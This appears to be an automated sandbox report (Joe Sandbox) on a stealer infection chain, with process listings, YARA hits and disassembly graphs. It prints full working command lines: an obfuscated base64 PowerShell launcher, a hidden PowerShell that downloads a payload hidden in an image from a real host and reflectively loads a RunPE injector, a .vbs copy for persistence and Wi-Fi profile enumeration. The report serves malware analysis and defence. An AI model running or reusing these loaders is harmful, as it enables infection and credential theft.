reZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBcDgTreFwDgTredDgTreBzDgTreGMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreFwDgTreQwBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreIDgTreBGDgTreGkDgTrebDgTreBlDgTreHMDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYQBiDgTreHUDgTrecgByDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
          Imagebase:0x7ff6cb6b0000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:09:15:01
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:09:15:02
          Start date:14/06/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }"
          Imagebase:0x7ff6cb6b0000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:6
          Start time:09:15:12
          Start date:14/06/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs"
          Imagebase:0x7ff7a9af0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:7
          Start time:09:15:12
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:9
          Start time:09:15:15
          Start date:14/06/2024
          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Imagebase:0xcd0000
          File size:43'008 bytes
          MD5 hash:9827FF3CDF4B83F9C86354606736CA9C
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_PXRECVOWEIWOEI, Description: Yara detected PXRECVOWEIWOEI Stealer, Source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          Reputation:moderate
          Has exited:true

          Target ID:12
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Imagebase:0xa40000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:13
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6ee680000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:14
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\System32\msiexec.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\msiexec.exe /V
          Imagebase:0x7ff63cc90000
          File size:69'632 bytes
          MD5 hash:E5DA170027542E25EDE42FC54C929077
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:15
          Start time:09:15:23
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\chcp.com
          Wow64 process (32bit):true
          Commandline:chcp 65001
          Imagebase:0x230000
          File size:12'800 bytes
          MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:16
          Start time:09:15:24
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\netsh.exe
          Wow64 process (32bit):true
          Commandline:netsh wlan show profile
          Imagebase:0x15c0000
          File size:82'432 bytes
          MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:17
          Start time:09:15:25
          Start date:14/06/2024
          Path:C:\Windows\SysWOW64\findstr.exe
          Wow64 process (32bit):true
          Commandline:findstr All
          Imagebase:0xc30000
          File size:29'696 bytes
          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Reset < >
            Memory Dump Source
            • Source File: 00000003.00000002.1983952218.00007FFB4AFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFD0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_7ffb4afd0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
            • Instruction ID: e5bada000c7c9e2c5f212754cbd1010d39428a9fb8ca2d2a2f950e9bbc995aa4
            • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
            • Instruction Fuzzy Hash: 3101677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3691DB36E882CB45

            Execution Graph

            Execution Coverage:10.2%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:12.2%
            Total number of Nodes:49
            Total number of Limit Nodes:5
            execution_graph 112819 1695b88 112821 1695b8e 112819->112821 112820 1695be0 112821->112820 112823 1695c19 112821->112823 112824 1695c2d 112823->112824 112825 1695c5b 112824->112825 112829 1696738 112824->112829 112834 16967dc 112824->112834 112839 1696748 112824->112839 112825->112821 112830 169674d 112829->112830 112831 16967d3 112830->112831 112844 64272f0 112830->112844 112849 64272e0 112830->112849 112831->112824 112836 169674d 112834->112836 112835 16967d3 112835->112824 112836->112835 112837 64272e0 2 API calls 112836->112837 112838 64272f0 2 API calls 112836->112838 112837->112836 112838->112836 112841 169674d 112839->112841 112840 16967d3 112840->112824 112841->112840 112842 64272e0 2 API calls 112841->112842 112843 64272f0 2 API calls 112841->112843 112842->112841 112843->112841 112845 6427305 112844->112845 112846 6427322 112845->112846 112854 6427368 112845->112854 112857 6427360 112845->112857 112846->112830 112850 64272f0 112849->112850 112851 6427322 112850->112851 112852 6427360 CheckRemoteDebuggerPresent 112850->112852 112853 6427368 CheckRemoteDebuggerPresent 112850->112853 112851->112830 112852->112851 112853->112851 112855 64273b0 CheckRemoteDebuggerPresent 112854->112855 112856 6427416 112855->112856 112856->112846 112858 6427368 CheckRemoteDebuggerPresent 112857->112858 112860 6427416 112858->112860 112860->112846 112812 68363d0 112813 68363db 112812->112813 112815 68363eb 112813->112815 112816 6835910 112813->112816 112817 6836420 OleInitialize 112816->112817 112818 68364a7 112817->112818 112818->112815 112865 670d0c8 112866 670d0e5 112865->112866 112868 64272e0 2 API calls 112866->112868 112869 64272f0 2 API calls 112866->112869 112867 670d9c8 112868->112867 112869->112867 112861 68369a8 112862 6836a0b OleGetClipboard 112861->112862 112864 6836a74 112862->112864 112870 6835db8 DuplicateHandle 112871 6835e95 112870->112871

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 1425 66fc116-66fc118 1426 66fc11a-66fc17b 1425->1426 1427 66fc0d0-66fc0e0 1425->1427 1443 66fc186-66fc18f call 66fe481 1426->1443 1428 66fc0eb-66fc0ec 1427->1428 1430 66fc0ee-66fc0ef 1428->1430 1431 66fc0a6-66fc0c4 1428->1431 1433 66fc0fa 1430->1433 1434 66fc0f1-66fc0f8 1430->1434 1431->1428 1438 66fc0fb 1433->1438 1434->1433 1438->1438 1445 66fc198-66fc202 1443->1445 1454 66fc20a-66fc213 call 66fe690 1445->1454 1456 66fc21c-66fc3f9 1454->1456 1493 66fc404-66fc428 call 66fecb3 1456->1493 1498 66fc431-66fc486 1493->1498 1504 66fc491-66fc4b5 call 66feeb0 1498->1504 1508 66fc4c1-66fc568 1504->1508 1518 66fc573-66fc5c1 call 66ff0b0 1508->1518 1524 66fc5cd-66fc613 1518->1524 1529 66fc61e-66fc636 call 66ff2cb 1524->1529 1532 66fc642 1529->1532 1533 66fc64e 1532->1533 1534 66fc65a-66fc6f5 1533->1534 1543 66fc700-66fc70c call 66ff4d0 1534->1543 1545 66fc718-66fc7a0 1543->1545 1554 66fc7ab-66fc7db call 66ff6d3 1545->1554 1559 66fc7e7-66fc882 1554->1559 1568 66fc88d 1559->1568 2032 66fc893 call 66ff8f8 1568->2032 2033 66fc893 call 66ff9a0 1568->2033 1569 66fc899-66fc8b1 1572 66fc8bd 1569->1572 1573 66fc8c9-66fc8db 1572->1573 1574 66fc8e7-66fc92d 1573->1574 1579 66fc938-66fc944 call 66ffb08 1574->1579 1581 66fc950 1579->1581 1582 66fc95c 1581->1582 1583 66fc968-66fca4a 1582->1583 1598 66fca56-66fca68 1583->1598 1599 66fca74-66fcaba 1598->1599 1604 66fcac5 1599->1604 1605 66fcad1-66fcb9c 1604->1605 1618 66fcba7 1605->1618 1619 66fcbb3-66fcd29 1618->1619 1643 66fcd34 1619->1643 1644 66fcd40-66fcf9c 1643->1644 1684 66fcfa8-66fcfba 1644->1684 1685 66fcfc6-66fd35d 1684->1685 1743 66fd368 1685->1743 1744 66fd374-66fd5ac 1743->1744 1781 66fd5b8 1744->1781 1782 66fd5c4-66fd991 1781->1782 1843 66fd99c 1782->1843 2021 66fd9a2 call 67028e0 1843->2021 2022 66fd9a2 call 67028d3 1843->2022 1844 66fd9a8-66fdbc9 1879 66fdbd4 1844->1879 2027 66fdbda call 6702f40 1879->2027 2028 66fdbda call 6702f30 1879->2028 1880 66fdbe0-66fdbec 1882 66fdbf8-66fdc04 1880->1882 1884 66fdc10-66fdfc5 1882->1884 1943 66fdfd0 1884->1943 2029 66fdfd6 call 6705e48 1943->2029 2030 66fdfd6 call 6705e39 1943->2030 1944 66fdfdc 1945 66fdfe8 1944->1945 1946 66fdff4-66fe152 1945->1946 1968 66fe15d 1946->1968 1969 66fe169-66fe473 1968->1969 2021->1844 2022->1844 2027->1880 2028->1880 2029->1944 2030->1944 2032->1569 2033->1569
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 428edfd67200d81aea1afb842755d3fc7a8d4c2754ed9ce38ca1ed6f95a2009c
            • Instruction ID: b74d81e015083ef4d60188b33eaef9dd1086f68c84b2dd749fefc177ed99701e
            • Opcode Fuzzy Hash: 428edfd67200d81aea1afb842755d3fc7a8d4c2754ed9ce38ca1ed6f95a2009c
            • Instruction Fuzzy Hash: 59239074D00229CFCB64EF64DC58A9EBBBABF48301F5045E9E909AB250DB759E81CF40

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 2035 68cea40-68cea6e 2036 68cea70-68cea72 2035->2036 2037 68cea79-68cea7c 2036->2037 2038 68cea74 2036->2038 2037->2036 2039 68cea7e-68cea86 2037->2039 2038->2037 2040 68cea8c-68cea90 2039->2040 2041 68cf133 2039->2041 2040->2041 2042 68cea96-68cea99 2040->2042 2043 68cf138-68cf13d 2041->2043 2042->2043 2044 68cea9f-68ceaa7 2042->2044 2052 68cf144-68cf14d 2043->2052 2045 68ceaad-68ceab0 2044->2045 2046 68cf09f-68cf0ba call 68cc780 2044->2046 2047 68cf12c-68cf131 2045->2047 2048 68ceab6-68cead7 call 68cc780 2045->2048 2055 68cf0bc-68cf0fe call 68cc780 * 2 2046->2055 2056 68cf100-68cf124 call 68cc780 2046->2056 2047->2052 2058 68cead9-68ceaf2 2048->2058 2059 68ceaf4-68ceb02 2048->2059 2055->2056 2056->2047 2067 68ceb0a-68ceb13 2058->2067 2059->2067 2067->2047 2069 68ceb19-68ceb34 call 68cc780 2067->2069 2074 68ceb3c-68ceb3f 2069->2074 2075 68ceb36-68ceb3a 2069->2075 2076 68ceb42-68cebdb call 68cd3a8 call 68cd4c0 call 68cd3a8 call 68cd4c0 call 68cd3a8 call 68cd4c0 2074->2076 2075->2074 2075->2076 2089 68cebec-68cec11 call 68cd3a8 2076->2089 2090 68cebdd 2076->2090 2089->2043 2101 68cec17-68cec39 call 68cd4c0 2089->2101 2091 68ced82-68ced86 2090->2091 2092 68cebe3-68cebe6 2090->2092 2094 68ced8c-68ced98 2091->2094 2095 68cf08b-68cf094 2091->2095 2092->2089 2092->2091 2094->2043 2096 68ced9e-68cedc4 2094->2096 2095->2069 2098 68cf09a 2095->2098 2096->2095 2106 68cedca 2096->2106 2098->2047 2101->2043 2105 68cec3f-68cec4e 2101->2105 2105->2043 2108 68cec54-68cec61 2105->2108 2107 68cedcd-68cedd3 2106->2107 2107->2043 2111 68cedd9-68cede6 2107->2111 2109 68cec73-68cec79 2108->2109 2110 68cec63 2108->2110 2109->2043 2116 68cec7f-68cec95 call 68cd720 2109->2116 2114 68cec69-68cec6d 2110->2114 2115 68ced04-68ced10 2110->2115 2112 68cedf8-68cedfe 2111->2112 2113 68cede8 2111->2113 2112->2043 2121 68cee04-68cee1a call 68cd720 2112->2121 2119 68cefec-68ceff8 2113->2119 2120 68cedee-68cedf2 2113->2120 2114->2109 2114->2115 2115->2043 2117 68ced16-68ced24 2115->2117 2131 68ceccf-68cecd8 2116->2131 2132 68cec97-68ceca0 2116->2132 2122 68ced26-68ced2a 2117->2122 2123 68ced32-68ced36 2117->2123 2119->2043 2124 68ceffe-68cf00d 2119->2124 2120->2112 2120->2119 2133 68cef86-68cef92 2121->2133 2134 68cee20-68cee30 2121->2134 2122->2041 2128 68ced30 2122->2128 2123->2041 2129 68ced3c-68ced3f 2123->2129 2124->2043 2130 68cf013-68cf049 call 68cc780 2124->2130 2128->2129 2129->2043 2137 68ced45-68ced4a 2129->2137 2167 68cf050-68cf05c 2130->2167 2131->2043 2136 68cecde-68ced02 2131->2136 2132->2043 2135 68ceca6-68cecca 2132->2135 2133->2043 2139 68cef98-68cefc0 2133->2139 2140 68cee41-68cee44 2134->2140 2141 68cee32 2134->2141 2142 68ced4c-68ced71 2135->2142 2136->2142 2137->2142 2139->2043 2158 68cefc6-68cefea 2139->2158 2145 68cf064-68cf06a 2140->2145 2147 68cee4a 2140->2147 2144 68cee38-68cee3b 2141->2144 2141->2145 2142->2091 2149 68ced73 2142->2149 2144->2140 2144->2145 2145->2043 2156 68cf070-68cf085 2145->2156 2153 68cef1d-68cef29 2147->2153 2154 68ceeb4-68ceec0 2147->2154 2155 68cee51-68cee5d 2147->2155 2149->2089 2150 68ced79-68ced7c 2149->2150 2150->2089 2150->2091 2153->2043 2160 68cef2f-68cef57 2153->2160 2154->2043 2157 68ceec6-68ceeee 2154->2157 2155->2043 2159 68cee63-68cee88 2155->2159 2156->2095 2156->2107 2157->2043 2166 68ceef4-68cef18 2157->2166 2158->2145 2159->2043 2168 68cee8e-68ceeaf 2159->2168 2160->2043 2169 68cef5d-68cef81 2160->2169 2166->2145 2167->2145 2168->2145 2169->2145
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.1752890537.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_68c0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID: d
            • API String ID: 0-2564639436
            • Opcode ID: 0cb7c2b37ab3f5efd10e2465918d18c947d805d9f989ba6488dd3b4550fbefe2
            • Instruction ID: 3a0357a5bfb4de515ede9035267fb331660e3d8c7eb3cde58171648269c1f5bb
            • Opcode Fuzzy Hash: 0cb7c2b37ab3f5efd10e2465918d18c947d805d9f989ba6488dd3b4550fbefe2
            • Instruction Fuzzy Hash: 0D322A71A002098FDB55DF6CC884AADB7F2FF88324F15C569D615EB265DB30E846CB84

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 2178 66fc128-66fc88d call 66fe481 call 66fe690 call 66fecb3 call 66feeb0 call 66ff0b0 call 66ff2cb call 66ff4d0 call 66ff6d3 2774 66fc893 call 66ff8f8 2178->2774 2775 66fc893 call 66ff9a0 2178->2775 2310 66fc899-66fd99c call 66ffb08 2763 66fd9a2 call 67028e0 2310->2763 2764 66fd9a2 call 67028d3 2310->2764 2585 66fd9a8-66fdbd4 2769 66fdbda call 6702f40 2585->2769 2770 66fdbda call 6702f30 2585->2770 2621 66fdbe0-66fdfd0 2771 66fdfd6 call 6705e48 2621->2771 2772 66fdfd6 call 6705e39 2621->2772 2685 66fdfdc-66fe15d 2710 66fe169-66fe473 2685->2710 2763->2585 2764->2585 2769->2621 2770->2621 2771->2685 2772->2685 2774->2310 2775->2310
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 39fd8e3751f6b342e511bcc31609f1b0710accb85dec36a3cfe73a59f088df5e
            • Instruction ID: bd5a9f01e0316d8c18d22fd3e8394052165e6d8025eb8b205b3bc91476355f80
            • Opcode Fuzzy Hash: 39fd8e3751f6b342e511bcc31609f1b0710accb85dec36a3cfe73a59f088df5e
            • Instruction Fuzzy Hash: BA238074D012298FCB64EF74DC58A9EBBBABF48301F5045E9E909AB250DB759E81CF40

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4189 6427360-6427414 CheckRemoteDebuggerPresent 4192 6427416-642741c 4189->4192 4193 642741d-6427476 4189->4193 4192->4193
            APIs
            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06427404
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID: CheckDebuggerPresentRemote
            • String ID:
            • API String ID: 3662101638-0
            • Opcode ID: 1722167a82b3845f50666c0a56e6cda876c646aa5ac2f1ffa320602be4d1cb83
            • Instruction ID: 10af312070e7705390d85a7d99ed99f9162ed6c266b17b4c35cb7f180c4fd01d
            • Opcode Fuzzy Hash: 1722167a82b3845f50666c0a56e6cda876c646aa5ac2f1ffa320602be4d1cb83
            • Instruction Fuzzy Hash: 9A41BCB9D05259DFDB10CFA9D484AEEFBF4AB09310F24905AE854B7250D338AA49CF64

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 4197 6427368-6427414 CheckRemoteDebuggerPresent 4199 6427416-642741c 4197->4199 4200 642741d-6427476 4197->4200 4199->4200
            APIs
            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 06427404
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID: CheckDebuggerPresentRemote
            • String ID:
            • API String ID: 3662101638-0
            • Opcode ID: f4fa468b33a599c13ecd96d5f808c28aec14f5de43aadf035a8f7d7e2fc0781a
            • Instruction ID: cce09f64e13173721243ca23da2d8f94c999e7161fea21c4ed92d1cef5079eb2
            • Opcode Fuzzy Hash: f4fa468b33a599c13ecd96d5f808c28aec14f5de43aadf035a8f7d7e2fc0781a
            • Instruction Fuzzy Hash: 5141BBB9D05259DFDB00CFAAD484AEEFBF4AB09310F24906AE414B7350D338AA45CF64
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 63669e970e7f33b99513907d609f7e2a3b196cb2134d6f02d9df7837fea802a6
            • Instruction ID: b3cf1f9b63bbefde68cfec6dfc4321490611066d0abb419169b7b956de13b424
            • Opcode Fuzzy Hash: 63669e970e7f33b99513907d609f7e2a3b196cb2134d6f02d9df7837fea802a6
            • Instruction Fuzzy Hash: 1092C974A002288FDB54EF78D858B9DBBB6BF89311F1084A9D60AEB355DB359D81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1750605108.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6830000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 70489eb8e74bc28451557c1437e475f4a116ae267107885f8810cde60fc9a25c
            • Instruction ID: 876440a1cdefd653519675de78237e91f3a67bf6c1a91da4dde7d6e4a54409e6
            • Opcode Fuzzy Hash: 70489eb8e74bc28451557c1437e475f4a116ae267107885f8810cde60fc9a25c
            • Instruction Fuzzy Hash: 6792C974A002288FDB54EF78D858B9DBBB6BF89311F1084A9D60AEB355DB359D81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a9acd44db07074a8fe3a55a46c33b8370e26f9c56ede087a7ed9d4fce77d4b06
            • Instruction ID: f57636d971ed74b6593e597149b206c04e03e0c2e6589c102bd89638a8e85285
            • Opcode Fuzzy Hash: a9acd44db07074a8fe3a55a46c33b8370e26f9c56ede087a7ed9d4fce77d4b06
            • Instruction Fuzzy Hash: 83A29E74D012298FCB64EFB4D948A9EBBB6BF49341F1045E9EA09A7350DB359E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 7d73d4947c155bc8d015383bb077ff60c3ac5725a0b15dc68e03211cf3134b2a
            • Instruction ID: 26476a140a8e5ce3601054b6a1e11577f247bbc5c3716e8b52a8ceb6d845df0d
            • Opcode Fuzzy Hash: 7d73d4947c155bc8d015383bb077ff60c3ac5725a0b15dc68e03211cf3134b2a
            • Instruction Fuzzy Hash: 27A29E74D01229CFCB64EFA4D948A9EBBB6BF49341F1045E9EA09A7350DB359E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748175670.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_66f0000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1c4f7d11a464829f5de2a0fc00be535cc84fd57f790e83c14eacf0ae46db9ca7
            • Instruction ID: 7ef4e1bec59e04830b6c36e3993d48f99659440da554e6feb0d764acf092e7d2
            • Opcode Fuzzy Hash: 1c4f7d11a464829f5de2a0fc00be535cc84fd57f790e83c14eacf0ae46db9ca7
            • Instruction Fuzzy Hash: 05928D74E002298FCB64AFA4D848A9DBBB6BF49301F5045E9E949AB350DB759E81CF40
            Memory Dump Source
            • Source File: 00000009.00000002.1748805800.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6700000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e7b07912a94cce95c84b672431de97dd3f034de574138102c27dd084cf317d0a
            • Instruction ID: 043590c082d2eab955a508e8d029252c9beefa67522b28afd4bb04b3bfe89839
            • Opcode Fuzzy Hash: e7b07912a94cce95c84b672431de97dd3f034de574138102c27dd084cf317d0a
            • Instruction Fuzzy Hash: 7572D174E00229CFDB549FB4D858A9DBBF6BF89341F1084A9E90AE7350EB359D818F50
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_6420000_AddInProcess32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 76ee089b06fd506866dfc71818cf21979840f98521a0c63b9ae4d140c4dd7421
            • Instruction ID: ac14a538c420f261661a6596c22d0d44307bebaecd7ecf934bb4689880bcbc3c
            • Opcode Fuzzy Hash: 76ee089b06fd506866dfc71818cf21979840f98521a0c63b9ae4d140c4dd7421
            • Instruction Fuzzy Hash: 0C029430B0071A8BDB69EA79C46067E76A3BFC9610FB4492AD406DB380DF76DC069791
            Memory Dump Source
            • Source File: 00000009.00000002.1745671419.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
            Joe Sandbox IDA Plugin
